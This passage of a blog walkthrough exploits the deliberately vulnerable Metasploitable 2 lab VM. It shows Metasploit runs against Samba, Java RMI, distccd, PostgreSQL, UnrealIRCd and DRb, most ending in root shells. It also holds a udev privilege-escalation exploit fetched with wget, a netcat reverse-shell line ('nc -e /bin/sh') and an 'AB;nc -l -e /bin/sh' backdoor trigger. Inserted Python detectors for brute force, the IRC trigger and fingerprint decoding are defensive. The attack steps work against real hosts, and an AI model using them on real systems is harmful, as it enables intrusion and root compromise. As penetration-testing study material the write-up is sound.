  home                               DR        0  Fri Apr 16 08:16:02 2010
  lib                                DR        0  Mon May 14 05:35:22 2012
  usr                                DR        0  Wed Apr 28 06:06:37 2010
  proc                               DR        0  Mon Nov 11 15:00:24 2013
  root                               DR        0  Mon Nov 11 15:01:51 2013
  sys                                DR        0  Mon Nov 11 15:00:28 2013
  boot                               DR        0  Mon May 14 05:36:28 2012
  nohup.out                           R     6542  Mon Nov 11 15:01:51 2013
  etc                                DR        0  Mon Nov 11 15:01:24 2013
  dev                                DR        0  Mon Nov 11 15:01:09 2013
  vmlinuz                             R  1987288  Thu Apr 10 18:55:41 2008
  opt                                DR        0  Tue Mar 16 23:57:39 2010
  var                                DR        0  Wed Mar 17 15:08:23 2010
  cdrom                              DR        0  Tue Mar 16 23:55:51 2010
  tmp                                 D        0  Tue Nov 12 08:35:42 2013
  srv                                DR        0  Tue Mar 16 23:57:38 2010

		56891 blocks of size 131072. 42480 blocks available
smb: \rootfs\>

We can also obtain a shell via Samba using Metasploit's usermap_script exploit:

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo KBoA0aqYLD2VrWzT;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "KBoA0aqYLD2VrWzT\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:48635) at 2013-11-12 17:38:37 +0000

whoami
root

Below is a video demonstrating this Metasploit shell exploit:

Metasploitable 2: Java RMI (Remote Method Invocation) Server


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
1099/tcp  open  rmiregistry GNU Classpath grmiregistry

From Wikipedia:

The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.

OK, let’s have a look in Metasploit:

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    1099             yes       The target port
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

Id  Name
--  ----
0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.1.78:4444
[*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx
[*]  Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx
[*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar
[*] 192.168.1.103    java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000
[+] Target 192.168.1.103:1099 may be exploitable...
[*] Server stopped.

meterpreter >

Below is a video demonstrating the above exploit.

 

Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation


The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
3632/tcp  open  distccd?

What is distccd?

Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile.

OK, time to search Metasploit:

msf > search distccd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

Let’s run the exploit:

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3632             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(distcc_exec) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i5VOR5zoE9EvGttx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i5VOR5zoE9EvGttx\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:46436) at 2013-11-19 10:59:04 +0000

whoami
daemon

As the “whoami” output shows, we have a shell running as the unprivileged daemon user.

Now we will escalate our privileges from daemon to root using the udev (< 141) local privilege escalation exploit, Exploit-DB entry 8572.

Firstly we get the exploit:

wget http://www.exploit-db.com/download/8572
--02:23:28--  http://www.exploit-db.com/download/8572
           => `8572'
Resolving www.exploit-db.com... 23.23.129.3, 23.23.150.193
Connecting to www.exploit-db.com|23.23.129.3|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/8572/ [following]
--02:23:29--  http://www.exploit-db.com/download/8572/
           => `index.html'
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 2,768 (2.7K) [application/txt]

    0K ..                                                    100%  414.77 KB/s

02:23:30 (414.77 KB/s) - `index.html' saved [2768/2768]

mv index.html exploit.c
gcc exploit.c -o exploit

The exploit instructions are:

Pass the PID of the udevd netlink socket (listed in /proc/net/netlink, usually is the udevd PID minus 1) as argv[1].

The exploit will execute /tmp/run as root so throw whatever payload you want in there.

Put simply, we must find the PID of udevd and subtract 1:

pgrep udevd
3125

Now we need to start Netcat in a new terminal in listening mode:

:~# nc -vlp 12345
listening on [any] 12345 ...

Now to the exploit. Note that the second line contains your attacking IP and the Netcat port, and the third line is the udevd PID minus one:

echo "#!/bin/sh" > /tmp/run
echo "nc -e /bin/sh 192.168.1.78 12345" >> /tmp/run
./exploit 3124

And our Netcat listener should come alive:

192.168.1.103: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.78] from (UNKNOWN) [192.168.1.103] 55574
whoami
root

And as you can see we are root!

Metasploitable 2: Port 5432 – PostgreSQL

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 – 8.3.7

This one is a straightforward brute-force login attempt using Metasploit:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(postgres_login) > run

[*] 192.168.1.103:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.1.103:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: '':''
[-] 192.168.1.103:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.1.103:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] 192.168.1.103:5432 Postgres - Invalid username or password: 'admin':''
[-] 192.168.1.103:5432 Postgres - [04/21] - Username/Password failed.
[*] 192.168.1.103:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] 192.168.1.103:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.103:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

And there we have it: the username and password are both postgres.
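The scanner output above is exactly what this login guessing looks like from the server side: a burst of failed authentications from one client host, then a success. The following detector, an added example written for this post and not code from Metasploit or PostgreSQL, runs over constructed PostgreSQL log lines. It assumes a log_line_prefix of the form `%t [%p] %h %u@%d ` (timestamp, backend PID, client host, user@database) and `log_connections = on`, which is what makes the successful login visible; the hosts, PIDs and timestamps are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed prefix: '%t [%p] %h %u@%d ' followed by the severity and message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[(?P<pid>\d+)\] "
    r"(?P<host>[\d.]+) (?P<user>\S+)@(?P<db>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)

# Constructed sample log: four guesses then a success from one host (the scanner pattern),
# an unrelated clean login, and a single typo followed by a successful login.
SAMPLE_LOG = """\
2013-11-20 08:04:10 UTC [4120] 192.168.1.78 postgres@template1 FATAL:  password authentication failed for user "postgres"
2013-11-20 08:04:10 UTC [4121] 192.168.1.78 [unknown]@template1 FATAL:  password authentication failed for user ""
2013-11-20 08:04:11 UTC [4122] 192.168.1.78 scott@template1 FATAL:  password authentication failed for user "scott"
2013-11-20 08:04:11 UTC [4123] 192.168.1.78 admin@template1 FATAL:  password authentication failed for user "admin"
2013-11-20 08:04:12 UTC [4124] 192.168.1.78 postgres@template1 LOG:  connection authorized: user=postgres database=template1
2013-11-20 08:05:30 UTC [4130] 192.168.1.50 app@appdb LOG:  connection authorized: user=app database=appdb
2013-11-20 09:30:00 UTC [4201] 192.168.1.60 app@appdb FATAL:  password authentication failed for user "app"
2013-11-20 09:30:05 UTC [4202] 192.168.1.60 app@appdb LOG:  connection authorized: user=app database=appdb
""".splitlines()


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the prefix."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
    if ev["level"] == "FATAL" and "authentication failed" in ev["msg"]:
        ev["event"] = "auth_failure"
    elif ev["level"] == "LOG" and ev["msg"].startswith("connection authorized"):
        ev["event"] = "auth_success"
    else:
        ev["event"] = "other"
    return ev


def detect_bruteforce(lines, threshold=3, window=timedelta(seconds=60),
                      success_min_failures=2):
    """Return alerts for (a) `threshold` failures from one client host inside `window`
    and (b) a successful login from a host that had at least `success_min_failures`
    recent failures, which is the signature of a guessed credential rather than a typo."""
    recent = defaultdict(list)      # client host -> [(ts, user)] failures still inside the window
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["event"] == "other":
            continue
        host, ts = ev["host"], ev["ts"]
        recent[host] = [(t, u) for t, u in recent[host] if ts - t <= window]
        if ev["event"] == "auth_failure":
            recent[host].append((ts, ev["user"]))
            if len(recent[host]) == threshold:          # fire once per burst, not on every extra failure
                alerts.append({"type": "bruteforce", "host": host, "ts": ts,
                               "users": sorted({u for _, u in recent[host]})})
        elif len(recent[host]) >= success_min_failures:
            alerts.append({"type": "success_after_failures", "host": host, "ts": ts,
                           "user": ev["user"], "failures": len(recent[host]),
                           "users": sorted({u for _, u in recent[host]})})
            recent[host] = []                           # the burst is closed by the success
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert type is the one worth paging on: a lone burst of failures may be a locked-out script, but failures followed by a success from the same host means the guessed password worked, and the session that follows (here, the psql and Meterpreter sessions below) should be treated as attacker activity.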

So let’s connect with the psql client from the terminal:

# psql -h 192.168.1.103 -U postgres -W
Password for user postgres: 
psql (9.1.9, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# \l
                    List of databases
   Name    |  Owner   | Encoding |   Access privileges   
-----------+----------+----------+-----------------------
 postgres  | postgres | UTF8     | 
 template0 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
 template1 | postgres | UTF8     | =c/postgres          +
           |          |          | postgres=CTc/postgres
(3 rows)

postgres=#

Below is a video demonstrating the above with additional post-exploitation manoeuvres:

Now we have the password we can also use Metasploit to obtain a Meterpreter shell:

msf > use exploit/linux/postgres/postgres_payload
msf exploit(postgres_payload) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD                   no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(postgres_payload) > set PASSWORD postgres
PASSWORD => postgres
msf exploit(postgres_payload) > set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
msf exploit(postgres_payload) > exploit

[*] Started bind handler
[*] 192.168.1.103:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/fTDEMbhY.so, should be cleaned up automatically
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:49575 -> 192.168.1.103:4444) at 2013-11-20 08:04:41 +0000

meterpreter >

Metasploitable 2: Port 6000 – X11 Server

It’s worth noting at the outset of this post that I was unsuccessful in exploiting this X11 service, but will document my efforts nonetheless.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
6000/tcp  open  X11         (access denied)

The Nessus scan on this port detailed the following:

Port 6000/tcp
10407 – X Server Detection

Synopsis
An X11 server is listening on the remote host

Description

The remote host is running an X11 server. X11 is a client-server protocol that can be used to display graphical applications running on a given host on a remote client.

Since the X11 traffic is not ciphered, it is possible for an attacker to eavesdrop on the connection.

Solution
Restrict access to this port. If the X11 client/server facility is not used, disable TCP support in X11 entirely (-nolisten tcp).

So Nessus is reporting the possibility of sniffing traffic. We can scan this service using Metasploit:

msf exploit(postgres_payload) > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options (auxiliary/scanner/x11/open_x11):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(open_x11) > exploit

[*] 192.168.1.103 Access Denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(open_x11) >

Metasploit is reporting “access denied”.

Everything I’ve read online relating to exploiting this service relies on open authentication, which in this instance does not appear to be the case.

Metasploit: The Penetration Tester’s Guide advises using the xspy sniffing tool to capture keystrokes, as the X system handles the GUI including the mouse and keyboard; however, this again relies on unauthenticated access to the X server, and so, as expected, the technique failed:

# xspy 192.168.1.103
Client is not authorized to connect to Serverxspy: can't open display 192.168.1.103:0
blah....

# xspy -display 192.168.1.103 -delay 100 -up
xspy: can't open display -display:0
blah....

As I’m not sure how to progress this one, I admit defeat at this point.


Metasploitable 2: UnrealIRCd IRC daemon

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd

UnrealIRCd is an Internet Relay Chat server.

This exploit has been made nice and easy for us:

On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months – triggered by sending the letters “AB” followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.

Source

The Nessus scan reported:

Port 6667/tcp

46882 – UnrealIRCd Backdoor Detection

Synopsis
The remote IRC server contains a backdoor.

Description
The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host.

See Also
http://seclists.org/fulldisclosure/2010/Jun/277
http://seclists.org/fulldisclosure/2010/Jun/284
http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Solution
Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.

Risk Factor
Critical

CVSS Base Score
10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score
8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References
BID 40820
CVE CVE-2010-2075
XREF OSVDB:65445

Exploitable with
CANVAS (true), Metasploit (true)

Plugin Information:
Publication date: 2010/06/14, Modification date: 2013/02/06
Ports
tcp/6667

The remote IRC server is running as :

uid=0(root) gid=0(root)

As this Nessus scan advises us that this is exploitable via Metasploit, let’s give it a go:

msf > search ircd
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.103:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo kt8lsphf0nxKGdOA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "kt8lsphf0nxKGdOA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.78:4444 -> 192.168.1.103:39851) at 2013-11-20 12:33:44 +0000

whoami
root

Success.

As this backdoor is triggered by sending the letters “AB” followed by a system command to the server on any listening port, we can also obtain a root shell manually using Ncat. In the terminal we input:

# echo "AB;nc -l -e /bin/sh -p 12345" | ncat 192.168.1.103 6697
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Found your hostname (cached)

Then we open Ncat and connect to the backdoor using another terminal:

# ncat 192.168.1.103 12345
whoami
root

Job done.
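Both the Metasploit module and the manual Ncat line above work because the trojaned server compared the first two bytes of every line it received against “AB” and handed the rest to the system shell. That makes the trigger easy to spot on the wire or in a server-side capture, provided the connection is cleartext (on Metasploitable 2 even port 6697 accepted the plain-text trigger, as the post shows). The detector below is an added example written for this post, not part of Metasploit or UnrealIRCd; the captured streams and source addresses are constructed, and the shell-syntax list used to rate severity is an assumption.

```python
import re

# Shell syntax that would make the text after "AB" run as a command pipeline.
# Used only to rate severity: the vulnerable server executed the remainder regardless.
SHELL_SYNTAX = re.compile(r"[;|&`]|\$\(")

# Constructed client->server byte streams as a sensor on the cleartext port might capture them.
SAMPLE_STREAMS = {
    "192.168.1.50": (b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #ops\r\n"
                     b"PRIVMSG #ops :ABC meeting moved to 10\r\n"   # "AB" not at line start: benign
                     b"ABOUT\r\n"                                    # not an IRC command, but no shell syntax
                     b"PING :irc.Metasploitable.LAN\r\n"),
    "192.168.1.78": (b"AB;nc -l -e /bin/sh -p 12345\n"               # the trigger shown in the post
                     b"AB; id\n"),
}


def lines_from_stream(src, data):
    """Split a captured client->server byte stream into (src, line) pairs.
    IRC lines end in CRLF; a bare LF is tolerated because netcat-style clients send that."""
    text = data.decode("latin-1")
    return [(src, ln) for ln in text.replace("\r\n", "\n").split("\n") if ln]


def classify(line):
    """Return None for a normal IRC line, or (severity, payload) when the line starts
    with the backdoor prefix. The check is on the line start only, because that is
    what the trojaned server tested; "AB" elsewhere in a message is ordinary chat."""
    if not line.startswith("AB"):
        return None
    payload = line[2:]
    severity = "high" if SHELL_SYNTAX.search(payload) else "medium"
    return severity, payload.strip()


def detect(pairs):
    """Scan (src, line) pairs and return one alert dict per suspicious line."""
    alerts = []
    for src, line in pairs:
        hit = classify(line)
        if hit is None:
            continue
        severity, payload = hit
        alerts.append({"src": src, "severity": severity, "payload": payload, "line": line})
    return alerts


def scan_streams(streams):
    """Run the detector over every captured stream; streams is {src_ip: bytes}."""
    pairs = []
    for src, data in streams.items():
        pairs.extend(lines_from_stream(src, data))
    return detect(pairs)


if __name__ == "__main__":
    for a in scan_streams(SAMPLE_STREAMS):
        print(f"{a['severity']:6} {a['src']:15} {a['payload']!r}")
```

A medium alert on a bare “ABOUT” is deliberate: no standard IRC command begins with “AB”, so the line is at least a client misbehaving, and on a vulnerable build the server would still have passed “OUT” to the shell. Remember that this only covers the network side; the Nessus remediation above (re-download and verify the distribution against its published checksums, then reinstall) is what actually removes the backdoor.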

Metasploitable 2: Port 8787 Open and Unknown

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
8787/tcp  open  unknown

As we can see, this Nmap scan did not recognise the service signature on port 8787, so I ran a more thorough Nmap version-detection scan against it:

~# nmap -p 8787 -sV --version-all 192.168.1.103

Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT     STATE SERVICE VERSION
8787/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"

The service is still unrecognised; however, the fingerprint contains some telling output: a Ruby library path and “DRb” (Distributed Ruby), which we can use as a search term within Metasploit:

msf > search drb
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

The drb_remote_codeexec module is the most promising, so we’ll run with that:

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root

And we have root.
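The Nmap fingerprint earlier in this post identified the service only because the listener answered a probe with an error message. Reading that reply is the same job a defender faces when inventorying an unknown listener, so here is an added example (written for this post, not Nmap's or Metasploit's code) that decodes the fingerprint exactly as printed above. It assumes Nmap's fingerprint escaping (`\xHH`, `\0`, `\n`, `\r`, `\t`, and a backslash before regex metacharacters such as `\.`, `\[` and `\"`), and that the DRb wire format is a 4-byte big-endian length followed by a Ruby Marshal dump (version 4.8); the indicator table is my own.

```python
import re

# The Nmap service fingerprint exactly as printed in the post; the last line is cut off.
FINGERPRINT = r"""
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"
"""

PROBE_RE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"')
_ESCAPES = {"0": b"\x00", "n": b"\n", "r": b"\r", "t": b"\t", "\\": b"\\"}

# Substrings that identify the software behind the reply (assumed indicator table).
INDICATORS = {
    b"DRb::": "Ruby DRb (distributed Ruby) object server",
    b"drb/drb.rb": "DRb library path leaked in a marshalled backtrace",
    b"/usr/lib/ruby/1.8/": "Ruby 1.8 standard library location",
}


def join_fingerprint(text):
    """Strip the SF-Port.../SF: line prefixes and rejoin the wrapped fingerprint."""
    parts = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("SF-Port"):
            parts.append(line.split(":", 1)[1])
        elif line.startswith("SF:"):
            parts.append(line[3:])
    return "".join(parts)


def unescape(s):
    """Turn Nmap's escaped response text back into the raw bytes the service sent."""
    out = bytearray()
    i = 0
    while i < len(s):
        c = s[i]
        if c != "\\":
            out += c.encode("latin-1")
            i += 1
        elif i + 1 >= len(s):
            break                                   # dangling backslash at a truncated end
        elif s[i + 1] == "x" and i + 3 < len(s):
            out.append(int(s[i + 2:i + 4], 16))
            i += 4
        elif s[i + 1] in _ESCAPES:
            out += _ESCAPES[s[i + 1]]
            i += 2
        else:                                       # escaped regex metacharacter: \. \[ \" ...
            out += s[i + 1].encode("latin-1")
            i += 2
    return bytes(out)


def parse_fingerprint(text):
    """Return the probe name, the declared reply length and the decoded (possibly truncated) bytes."""
    joined = join_fingerprint(text)
    m = PROBE_RE.search(joined)
    if not m:
        raise ValueError("no probe response found in fingerprint")
    i = j = m.end()
    while j < len(joined) and joined[j] != '"':     # find the closing quote, skipping escapes
        j += 2 if joined[j] == "\\" else 1
    data = unescape(joined[i:j])
    return {"probe": m.group(1), "declared_len": int(m.group(2), 16),
            "data": data, "truncated": j >= len(joined)}


def split_drb_frames(data):
    """Split DRb wire data into (declared_len, payload) frames; the last may be truncated."""
    frames, pos = [], 0
    while pos + 4 <= len(data):
        n = int.from_bytes(data[pos:pos + 4], "big")
        frames.append((n, data[pos + 4:pos + 4 + n]))
        pos += 4 + n
    return frames


def marshal_object_class(payload):
    """For a Marshal 4.8 dump of a plain object ('o' + class symbol) return the class name.
    Only the short symbol-length encoding (byte = length + 5, for lengths 1..122) is handled."""
    if payload[:4] != b"\x04\x08o:" or not (6 <= payload[4] <= 0x7F):
        return None
    length = payload[4] - 5
    return payload[5:5 + length].decode("latin-1")


def identify(data):
    """Human-readable indicators plus every Ruby library path found in the reply."""
    hits = [desc for marker, desc in INDICATORS.items() if marker in data]
    paths = sorted(set(re.findall(rb"/usr/lib/ruby/[\w./]+", data)))
    return hits, paths


if __name__ == "__main__":
    info = parse_fingerprint(FINGERPRINT)
    frames = split_drb_frames(info["data"])
    print(info["probe"], info["declared_len"], "bytes declared;", len(info["data"]), "captured")
    print("frames:", [(n, len(p)) for n, p in frames], "->", marshal_object_class(frames[1][1]))
    print(identify(info["data"]))
```

Decoding shows why the search term in the post was the right one: the reply is two DRb frames, a 3-byte Marshal `false` followed by a 928-byte marshalled `DRb::DRbConnError` whose backtrace names `/usr/lib/ruby/1.8/drb/drb.rb`, and 4 + 3 + 4 + 928 is exactly the 0x3AB bytes Nmap declared. Anything that chatty about its own internals on an unauthenticated port belongs behind a firewall or bound to localhost.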

Metasploitable 2: The Roundup

It has been rather enjoyable and satisfying hacking my way through Metasploitable 2. The process has consolidated some rather disparate knowledge in my brain and I’ve learned loads. I thoroughly recommend it for us noobies.

Below are links to all of my posts on hacking Metasploitable 2. Most of my endeavours were successful and a few weren’t, but I document the failures as I still gained from the process and perhaps others might have more success and let me know how they cracked it.

Firstly, here is the Nmap port scan link that provided my attack vectors:

Secondly, the Nessus scan proved invaluable.

Here are the links:

Metasploitable 2: Exploiting FTP server vsftpd backdoor

Metasploitable 2 – Open SSH: Bruteforcing and Debian OpenSSL Predictable PRNG

Metasploitable 2: Port 23 Open Telnet

Metasploitable 2: Port 25 Open SMTP Postfix SMTPD

Metasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning

Metasploitable 2: Apache killer DOS

Metasploitable 2: RPC (Remote Procedure Call) Server

Metasploitable 2: Samba Server

Metasploitable 2: Remote Access Ports 512, 513 & 514

